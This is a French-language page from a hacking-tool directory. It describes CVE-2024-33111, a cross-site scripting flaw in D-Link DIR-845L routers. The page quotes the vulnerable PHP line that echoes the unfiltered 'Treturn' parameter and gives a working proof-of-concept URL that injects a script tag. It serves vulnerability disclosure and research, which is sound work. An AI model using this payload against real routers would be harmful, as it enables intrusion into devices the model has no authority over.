Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-33111 — Le routeur D-Link DIR-845L est vulnérable à une faille de type Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php. | Kitploit
Outils/GitHubGitHub/fallenskill1/cve-2024-33111
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubfallenskill1/cve-2024-33111

CVE-2024-33111

Le routeur D-Link DIR-845L est vulnérable à une faille de type Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-33111

Les routeurs D-Link DIR-845L de version 1.01KRb03 et inférieures sont vulnérables au Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.

Composant vulnérable

  • /htdocs/webinc/js/bsc_sms_inbox.php

Détails techniques

La vulnérabilité est due à l'absence de filtrage du paramètre $_GET["Treturn"] qui est directement utilisé dans le code à la ligne 17 de bsc_sms_inbox.php.

L'extrait de code vulnérable :

root@kitploit:~
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';

PoC

root@kitploit:~
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

image

Télécharger l’outil